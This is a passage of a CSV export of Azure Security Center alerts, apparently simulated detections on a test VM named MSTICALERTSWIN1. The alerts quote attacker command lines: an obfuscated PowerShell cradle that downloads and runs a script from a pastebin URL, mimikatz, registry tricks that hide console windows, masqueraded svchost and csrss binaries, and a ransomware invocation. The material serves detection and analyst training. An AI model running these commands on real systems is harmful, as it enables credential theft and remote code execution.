]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 11:45:06,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
141,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 11:45:01,2019-01-15 11:45:01,5cb7ab95-6017-4031-afb2-e11518b0f5cc,2518547480980813134_5cb7ab95-6017-4031-afb2-e11518b0f5cc,Detection,Microsoft,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,Suspicious Powershell Activity Detected,"Analysis of host data detected a powershell script running on MSTICALERTSWIN1 that has features in common with known suspicious scripts. This script could either be legitimate activity, or an indication of a compromised host.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""WORKGROUP\\MSTICAlertsWin1$"",
""Account Session Id"": ""0x3e4"",
""Suspicious Process"": ""c:\\diagnostics\\systmp\\powershell.exe"",
""Suspicious Command Line"": "".\\powershell -c {iex (new-object net.webclient).downloadstring(('ht'+(\""{2}{0}{1}\""-f ':/','/paste','tp')+'bin/'+'raw/'+(\""{1}{0}\""-f'em17','pqcw')));}"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x134c"",
""Suspicious Script"": "".\\powershell -c {IEX (New-Object Net.WebClient).DownloadString(('ht'+(\""{2}{0}{1}\""-f ':/','/paste','tp')+'bin/'+'raw/'+(\""{1}{0}\""-f'Em17','pqCw')));}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x122c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAlertsWin1$"",
""NTDomain"": ""WORKGROUP"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-20"",
""IsDomainJoined"": true,
""Type"": ""account"",
""LogonId"": ""0x3e4""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\systmp"",
""Name"": ""powershell.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x134c"",
""CommandLine"": "".\\powershell -c {iex (new-object net.webclient).downloadstring(('ht'+(\""{2}{0}{1}\""-f ':/','/paste','tp')+'bin/'+'raw/'+(\""{1}{0}\""-f'em17','pqcw')));}"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T11:45:01.9186865Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x3e4"",
""StartTimeUtc"": ""2019-01-15T11:45:01.9186865Z"",
""EndTimeUtc"": ""2019-01-15T11:45:01.9186865Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 11:45:06,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
142,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 11:45:02,2019-01-15 11:45:02,2a106d12-acd8-4dd7-9e1c-3c20b4eaa320,2518547480976076338_2a106d12-acd8-4dd7-9e1c-3c20b4eaa320,Detection,Microsoft,Suspicious process executed,Suspicious process executed,Suspicious process executed,"Machine logs indicate that the suspicious process: 'c:\diagnostics\systmp\mimikatz.exe' was running on the machine, often associated with attacker attempts to access credentials.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""WORKGROUP\\MSTICAlertsWin1$"",
""Account Session Id"": ""0x3e4"",
""Suspicious Process"": ""c:\\diagnostics\\systmp\\mimikatz.exe"",
""Suspicious Command Line"": "".\\mimikatz.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1664"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x122c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAlertsWin1$"",
""NTDomain"": ""WORKGROUP"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-20"",
""IsDomainJoined"": true,
""Type"": ""account"",
""LogonId"": ""0x3e4""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\systmp"",
""Name"": ""mimikatz.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1664"",
""CommandLine"": "".\\mimikatz.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T11:45:02.3923661Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x3e4"",
""StartTimeUtc"": ""2019-01-15T11:45:02.3923661Z"",
""EndTimeUtc"": ""2019-01-15T11:45:02.3923661Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 11:45:06,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
143,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 11:45:02,2019-01-15 11:45:02,e9ff6947-fd12-42d2-bb63-2d814f04482a,2518547480977469312_e9ff6947-fd12-42d2-bb63-2d814f04482a,Detection,Microsoft,Suspicious WindowPosition registry value detected,Suspicious WindowPosition registry value detected,Suspicious WindowPosition registry value detected,"Analysis of host data on MSTICALERTSWIN1 detected an attempted WindowPosition registry configuration change that could be indicative of hiding application windows in non-visible sections of the desktop. This could be legitimate activity, or an indication of a compromised machine: this type of activity has been previously associated with known adware (or unwanted software) such as Win32/OneSystemCare and Win32/SystemHealer and malware such as Win32/Creprote. When the WindowPosition value is set to 201329664 (Hex: 0x0c00 0c00, corresponding to X-axis=0c00 and Y-axis=0c00), this places the console app's window in a non-visible section of the user's screen in an area that is hidden from view below the visible start menu/taskbar. Known suspect Hex values include, but are not limited to, c000c000",Low,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""WORKGROUP\\MSTICAlertsWin1$"",
""Account Session Id"": ""0x3e4"",
""Suspicious Process"": ""c:\\diagnostics\\systmp\\reg.exe"",
""Suspicious Command Line"": "".\\reg.exe add \""hkcu\\console\"" /v windowposition /t reg_dword /d 33554556 /f"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x1430"",
""Hex Value set for WindowPosition"": ""200007c"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x122c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAlertsWin1$"",
""NTDomain"": ""WORKGROUP"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-20"",
""IsDomainJoined"": true,
""Type"": ""account"",
""LogonId"": ""0x3e4""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\systmp"",
""Name"": ""reg.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1430"",
""CommandLine"": "".\\reg.exe add \""hkcu\\console\"" /v windowposition /t reg_dword /d 33554556 /f"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T11:45:02.2530687Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""Hive"": ""HKEY_CURRENT_USER"",
""Key"": ""console"",
""Type"": ""registry-key""
},
{
""$id"": ""11"",
""Key"": {
""$ref"": ""10""
},
""ValueType"": ""Unknown"",
""Type"": ""registry-value""
},
{
""$id"": ""12"",
""Key"": {
""$ref"": ""10""
},
""Name"": ""windowposition"",
""Value"": ""System.Byte[]"",
""ValueType"": ""DWord"",
""Type"": ""registry-value""
},
{
""$id"": ""13"",
""SessionId"": ""0x3e4"",
""StartTimeUtc"": ""2019-01-15T11:45:02.2530687Z"",
""EndTimeUtc"": ""2019-01-15T11:45:02.2530687Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 11:45:06,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
144,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 11:45:02,2019-01-15 11:45:02,ed9d92ac-0ab8-4a2e-a1dd-f70ee30a9af1,2518547480977057409_ed9d92ac-0ab8-4a2e-a1dd-f70ee30a9af1,Detection,Microsoft,Executable found running from a suspicious location,Executable found running from a suspicious location,Executable found running from a suspicious location,"Analysis of host data detected an executable file on MSTICALERTSWIN1 that is running from a location in common with known suspicious files. This executable could either be legitimate activity, or an indication of a compromised host.",Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""WORKGROUP\\MSTICAlertsWin1$"",
""Account Session Id"": ""0x3e4"",
""Suspicious Process"": ""c:\\windows\\fonts\\csrss.exe"",
""Suspicious Command Line"": ""c:\\windows\\fonts\\csrss.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x15e8"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x122c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAlertsWin1$"",
""NTDomain"": ""WORKGROUP"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-20"",
""IsDomainJoined"": true,
""Type"": ""account"",
""LogonId"": ""0x3e4""
},
{
""$id"": ""8"",
""Directory"": ""c:\\windows\\fonts"",
""Name"": ""csrss.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x15e8"",
""CommandLine"": ""c:\\windows\\fonts\\csrss.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T11:45:02.294259Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x3e4"",
""StartTimeUtc"": ""2019-01-15T11:45:02.294259Z"",
""EndTimeUtc"": ""2019-01-15T11:45:02.294259Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 11:45:06,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
145,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 11:45:02,2019-01-15 11:45:02,7e663699-5412-496f-ac91-e21a7b6f0be5,2518547480975043692_7e663699-5412-496f-ac91-e21a7b6f0be5,Detection,Microsoft,Executable found running from a suspicious location,Executable found running from a suspicious location,Executable found running from a suspicious location,"Analysis of host data detected an executable file on MSTICALERTSWIN1 that is running from a location in common with known suspicious files. This executable could either be legitimate activity, or an indication of a compromised host.",Medium,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""WORKGROUP\\MSTICAlertsWin1$"",
""Account Session Id"": ""0x3e4"",
""Suspicious Process"": ""c:\\diagnostics\\systmp\\regsvr32.exe"",
""Suspicious Command Line"": "".\\regsvr32 /u /s c:\\windows\\fonts\\csrss.exe"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0x73c"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x122c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAlertsWin1$"",
""NTDomain"": ""WORKGROUP"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-20"",
""IsDomainJoined"": true,
""Type"": ""account"",
""LogonId"": ""0x3e4""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\systmp"",
""Name"": ""regsvr32.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x73c"",
""CommandLine"": "".\\regsvr32 /u /s c:\\windows\\fonts\\csrss.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T11:45:02.4956307Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x3e4"",
""StartTimeUtc"": ""2019-01-15T11:45:02.4956307Z"",
""EndTimeUtc"": ""2019-01-15T11:45:02.4956307Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 11:45:06,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
146,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 11:45:05,2019-01-15 11:45:05,f83c0705-d2ff-4355-a25d-ae858ee39b2d,2518547480946682289_f83c0705-d2ff-4355-a25d-ae858ee39b2d,Detection,Microsoft,Rare SVCHOST service group executed,Rare SVCHOST service group executed,Rare SVCHOST service group executed,The system process SVCHOST was observed running a rare service group. Malware often use SVCHOST to masquerade its malicious activity.,Informational,False,"{
""user name"": ""WORKGROUP\\MSTICAlertsWin1$"",
""process name"": ""c:\\windows\\system32\\svchost.exe"",
""command line"": ""c:\\windows\\system32\\svchost.exe -k malicious"",
""parent process"": ""cmd.exe"",
""process id"": ""0x138c"",
""account logon id"": ""0x3e4"",
""User SID"": ""S-1-5-20"",
""parent process id"": ""0x122c"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Suspicious SVCHost\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Suspicious-SVCHost.pdf?sv=2018-03-28&sr=b&sig=LiCwFh64yyJn1k1fvbXfd7nZFxe9c4Y852b0VekrMJw%3D&spr=https&st=2019-01-14T14:11:54Z&se=2019-04-14T14:26:54Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=dbb5dbe9-5ab7-455f-96cf-d88ac58c1c00\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x122c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAlertsWin1$"",
""NTDomain"": ""WORKGROUP"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-20"",
""IsDomainJoined"": true,
""Type"": ""account"",
""LogonId"": ""0x3e4""
},
{
""$id"": ""8"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""svchost.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x138c"",
""CommandLine"": ""c:\\windows\\system32\\svchost.exe -k malicious"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T11:45:05.331771Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x3e4"",
""StartTimeUtc"": ""2019-01-15T11:45:05.331771Z"",
""EndTimeUtc"": ""2019-01-15T11:45:05.331771Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 11:45:13,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,
147,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 11:45:06,2019-01-15 11:45:06,ec1678a1-0fe8-44c5-91b5-621c40d2bb8c,2518547480937987105_ec1678a1-0fe8-44c5-91b5-621c40d2bb8c,Detection,Microsoft,Ransomware indicators detected,Ransomware indicators detected,Ransomware indicators detected,"Analysis of host data indicates suspicious activity traditionally associated with lock-screen and encryption ransomware. Lock screen ransomware displays a full-screen message preventing interactive use of the host and access to its files. Encryption ransomware prevents access by encrypting data files. In both cases a ransom message is typically displayed, requesting payment in order to restore file access.",High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""WORKGROUP\\MSTICAlertsWin1$"",
""Account Session Id"": ""0x3e4"",
""Suspicious Process"": ""c:\\diagnostics\\systmp\\ransomware.exe"",
""Suspicious Command Line"": ""c:\\diagnostics\\systmp\\ransomware.exe @ abc.com abc.wallet"",
""Parent Process"": ""c:\\windows\\system32\\cmd.exe"",
""Suspicious Process Id"": ""0xb10"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Shadow Copy Delete\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Shadow-Copy-Delete.pdf?sv=2018-03-28&sr=b&sig=tL87fydg2X3ANo7oW3HGLc%2BTDgcnvawDxPkkDILtH7Q%3D&spr=https&st=2019-01-14T17:39:21Z&se=2019-04-14T17:54:21Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=344d72a7-1b67-426c-bb5a-c14a81f7e675\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x122c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAlertsWin1$"",
""NTDomain"": ""WORKGROUP"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-20"",
""IsDomainJoined"": true,
""Type"": ""account"",
""LogonId"": ""0x3e4""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\systmp"",
""Name"": ""ransomware.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0xb10"",
""CommandLine"": ""c:\\diagnostics\\systmp\\ransomware.exe @ abc.com abc.wallet"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T11:45:06.2012894Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x3e4"",
""StartTimeUtc"": ""2019-01-15T11:45:06.2012894Z"",
""EndTimeUtc"": ""2019-01-15T11:45:06.2012894Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 11:45:13,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,MSTICALERTSWIN1
148,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 11:45:05,2019-01-15 11:45:05,5c82cd9c-60f8-4056-bd39-8ccb2cdb7678,2518547480947565906_5c82cd9c-60f8-4056-bd39-8ccb2cdb7678,Detection,Microsoft,Suspicious SVCHOST process executed,Suspicious SVCHOST process executed,Suspicious SVCHOST process executed,The system process SVCHOST was observed running in an abnormal context. Malware often use SVCHOST to masquerade its malicious activity.,High,False,"{
""user name"": ""WORKGROUP\\MSTICAlertsWin1$"",
""process name"": ""c:\\diagnostics\\systmp\\svchost.exe"",
""command line"": ""c:\\diagnostics\\systmp\\svchost.exe"",
""parent process"": ""cmd.exe"",
""process id"": ""0x1008"",
""account logon id"": ""0x3e4"",
""User SID"": ""S-1-5-20"",
""parent process id"": ""0x122c"",
""enrichment_tas_threat__reports"": ""{\""Kind\"":\""MultiLink\"",\""DisplayValueToUrlDictionary\"":{\""Report: Suspicious SVCHost\"":\""https://iflowreportsproda.blob.core.windows.net/reports/MSTI-TS-Suspicious-SVCHost.pdf?sv=2018-03-28&sr=b&sig=LueDumic0L5UTuSQN3FPjliH4QkhDGHUL9y3YsjBTpM%3D&spr=https&st=2019-01-14T14:59:40Z&se=2019-04-14T15:14:40Z&sp=r&callerId=ddd5443d-e6f4-441c-b52b-5278d2f21dfa&tenantId=344d72a7-1b67-426c-bb5a-c14a81f7e675\""}}"",
""resourceType"": ""Virtual Machine"",
""ServiceId"": ""14fa08c7-c48e-4c18-950c-8148024b4398"",
""ReportingSystem"": ""Azure"",
""OccuringDatacenter"": ""eastus""
}","[
{
""$id"": ""4"",
""DnsDomain"": """",
""NTDomain"": """",
""HostName"": ""MSTICALERTSWIN1"",
""NetBiosName"": ""MSTICALERTSWIN1"",
""OSFamily"": ""Windows"",
""OSVersion"": ""Windows"",
""IsDomainJoined"": false,
""Type"": ""host""
},
{
""$id"": ""5"",
""Directory"": ""c:\\windows\\system32"",
""Name"": ""cmd.exe"",
""Type"": ""file""
},
{
""$id"": ""6"",
""ProcessId"": ""0x122c"",
""CommandLine"": """",
""ImageFile"": {
""$ref"": ""5""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""7"",
""Name"": ""MSTICAlertsWin1$"",
""NTDomain"": ""WORKGROUP"",
""Host"": {
""$ref"": ""4""
},
""Sid"": ""S-1-5-20"",
""IsDomainJoined"": true,
""Type"": ""account"",
""LogonId"": ""0x3e4""
},
{
""$id"": ""8"",
""Directory"": ""c:\\diagnostics\\systmp"",
""Name"": ""svchost.exe"",
""Type"": ""file""
},
{
""$id"": ""9"",
""ProcessId"": ""0x1008"",
""CommandLine"": ""c:\\diagnostics\\systmp\\svchost.exe"",
""ElevationToken"": ""Default"",
""CreationTimeUtc"": ""2019-01-15T11:45:05.2434093Z"",
""ImageFile"": {
""$ref"": ""8""
},
""Account"": {
""$ref"": ""7""
},
""ParentProcess"": {
""$ref"": ""6""
},
""Host"": {
""$ref"": ""4""
},
""Type"": ""process""
},
{
""$id"": ""10"",
""SessionId"": ""0x3e4"",
""StartTimeUtc"": ""2019-01-15T11:45:05.2434093Z"",
""EndTimeUtc"": ""2019-01-15T11:45:05.2434093Z"",
""Type"": ""host-logon-session"",
""Host"": {
""$ref"": ""4""
},
""Account"": {
""$ref"": ""7""
}
}
]",Unknown,,,3c1bb38c-82e3-4f8d-a115-a7110ba70d05,contoso77,2019-01-15 11:45:13,/subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourceGroups/ASIHuntOMSWorkspaceRG/providers/Microsoft.Compute/virtualMachines/MSTICAlertsWin1,46fe7078-61bb-4bed-9430-7ac01d91c273,
149,802d39e1-9d70-404d-832c-2de5e2478eda,2019-01-15 11:45:05,2019-01-15 11:45:05,00d33245-c643-4155-8c05-6abc4ee3b3cd,2518547480945920380_00d33245-c643-4155-8c05-6abc4ee3b3cd,Detection,Microsoft,Azure Security Center test alert (not a threat),Azure Security Center test alert (not a threat),Azure Security Center test alert (not a threat),This is a test alert generated by Azure Security Center. No further action is needed.,High,False,"{
""Compromised Host"": ""MSTICALERTSWIN1"",
""User Name"": ""WORKGROUP\\MSTICAlertsWin1$"",
""Account Session Id"": ""0x3e4"",
""Suspicious Process"": ""c:\\diagnostics\\systmp\\asc_alerttest_662jfi039n.exe"",
